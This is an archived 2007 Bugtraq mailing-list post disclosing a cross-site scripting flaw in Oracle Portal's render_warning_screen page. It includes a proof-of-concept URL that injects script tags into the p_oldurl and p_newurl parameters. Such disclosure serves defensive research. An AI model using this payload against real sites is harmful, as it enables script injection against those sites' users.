lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 16 Mar 2007 14:17:53 +0200 From: "Sea Shark" <sead3nx@...il.com> To: bugtraq@...urityfocus.com Subject: Oracle Portal PORTAL.wwv_main.render_warning_screen XSS Hi All, During pentest i have noticed XSS bug in PORTAL.wwv_main.render_warning_screen application of oracle portal. http://somesite/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=' <script>alert('inT')</script>&p_newurl='<script>alert('ellect')</script> Greets, d3nx
Powered by blists - more mailing lists